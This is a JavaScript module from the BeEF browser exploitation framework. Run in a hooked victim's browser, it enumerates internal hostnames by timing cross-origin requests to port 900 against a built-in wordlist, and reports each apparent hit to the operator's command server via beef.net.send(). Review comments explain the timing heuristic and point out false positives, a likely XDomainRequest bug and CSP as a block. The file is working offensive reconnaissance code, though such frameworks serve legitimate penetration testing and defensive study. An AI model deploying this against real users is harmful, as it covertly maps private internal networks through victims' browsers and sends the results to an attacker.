beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/network/dns_enumeration/command.js
//
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// DNS enumeration module body, handed to beef.execute() as a callback.
//
// The <%= ... %> tags are template placeholders that are replaced with
// concrete values before the browser receives this script:
//   @dns_list    comma-separated hostnames, or the sentinel "%default%" to
//                select the built-in list of common single-label names
//   @timeout     per-host wait passed to setTimeout() (milliseconds)
//   @command_url / @command_id   forwarded to beef.net.send() with each result
//
// Classification, as implemented below: each candidate is requested with a
// cross-origin GET to http://<name>:900. If the request reaches readyState 4
// before the timer fires, the name is skipped without a report. If the timer
// fires first, the name is reported as "Internal DNS found". Presumably a name
// that does not resolve fails fast while a resolvable one leaves the
// connection pending (NOTE(review): inferred from the logic, confirm).
// Anything else that stalls longer than @timeout is reported the same way, so
// the output can contain false positives.
//
// Seen from the network side, this is one browser working through the list a
// name at a time, each step causing a GET attempt on port 900 (and, by
// implication, a name lookup). A Content-Security-Policy connect-src
// restriction on the hosting page applies to XMLHttpRequest and should stop
// these requests; verify per deployment.
beef.execute(function() {

  var dns_list = "<%= @dns_list %>";
  // NOTE(review): no radix is passed; a non-numeric value yields NaN, which
  // setTimeout() treats as 0, so every name would be reported immediately.
  var timeout = parseInt("<%= @timeout %>");

  var protocol = "http://";
  var port = 900;
  var current = 0; // index of the candidate being probed

  // Operator-supplied list, or the built-in wordlist when the sentinel is set.
  var candidates = dns_list !== "%default%"
    ? dns_list.split(",")
    : [
        "abc", "about", "accounts", "admin", "administrador", "administrator",
        "ads", "adserver", "adsl", "agent", "blog", "channel", "client", "dev",
        "dev1", "dev2", "dev3", "dev4", "dev5", "dmz", "dns", "dns0", "dns1",
        "dns2", "dns3", "extern", "extranet", "file", "forum", "forums", "ftp",
        "ftpserver", "host", "http", "https", "ida", "ids", "imail", "imap",
        "imap3", "imap4", "install", "intern", "internal", "intranet", "irc",
        "linux", "log", "mail", "map", "member", "members", "name", "nc", "ns",
        "ntp", "ntserver", "office", "owa", "phone", "pop", "ppp1", "ppp10",
        "ppp11", "ppp12", "ppp13", "ppp14", "ppp15", "ppp16", "ppp17", "ppp18",
        "ppp19", "ppp2", "ppp20", "ppp21", "ppp3", "ppp4", "ppp5", "ppp6",
        "ppp7", "ppp8", "ppp9", "pptp", "print", "printer", "project", "pub",
        "public", "preprod", "root", "route", "router", "server", "smtp", "sql",
        "sqlserver", "ssh", "telnet", "time", "voip", "w", "webaccess",
        "webadmin", "webmail", "webserver", "website", "win", "windows", "ww",
        "www", "wwww", "xml"
      ];

  // Builds the URL requested for the candidate at position i.
  function target_url(i) {
    return protocol + candidates[i] + ":" + port;
  }

  // Sends one result line back through beef.net.send().
  function report(message) {
    beef.net.send('<%= @command_url %>', <%= @command_id %>, message);
  }

  // Timer path: the request for the current candidate did not finish within
  // `timeout`, so the name is reported and the walk continues.
  function notify() {
    report('result=Internal DNS found: '+ candidates[current]);
    check_next();
  }

  // Advances to the next candidate; once the list is exhausted, sends the
  // completion message after a fixed one-second delay.
  function check_next() {
    current += 1;
    if (current >= candidates.length) {
      setTimeout(function() { report('result=DNS Enumeration done'); }, 1000);
      return;
    }
    do_resolv(target_url(current));
  }

  // Issues one asynchronous cross-origin GET for `url` and arms the timer
  // that decides the outcome. Returns -1 when the browser offers neither
  // CORS-capable XMLHttpRequest nor XDomainRequest; otherwise returns
  // undefined.
  function do_resolv(url) {
    var request = new XMLHttpRequest();
    var timer;

    if (!("withCredentials" in request)) {
      if (typeof XDomainRequest === "undefined") {
        return -1;
      }
      // NOTE(review): XDomainRequest signals completion through
      // onload/onerror rather than onreadystatechange, so on this path the
      // handler below would not run and the timer would always fire,
      // reporting every name as found. Confirm before trusting results from
      // browsers that take this branch.
      request = new XDomainRequest();
      request.open("GET", url);
    } else {
      request.open("GET", url, true);
    }

    // Completed (successfully or not) before the timer: cancel the timer and
    // move on without reporting this name.
    request.onreadystatechange = function(e) {
      if (request.readyState !== 4) {
        return;
      }
      clearTimeout(timer);
      check_next();
    };

    request.send();

    // Still pending after `timeout`: detach the handler so a late completion
    // cannot advance the walk a second time, then report.
    timer = setTimeout(function() {
      request.onreadystatechange = function(evt) {};
      notify();
    }, timeout);
  }

  report('result=Starting DNS enumeration: '+ candidates.length + ' hostnames loaded');

  // Only the first call's return value is checked; later calls are made from
  // check_next(), which ignores it.
  if (do_resolv(target_url(0)) === -1) {
    report('result=Browser not supported');
  }

});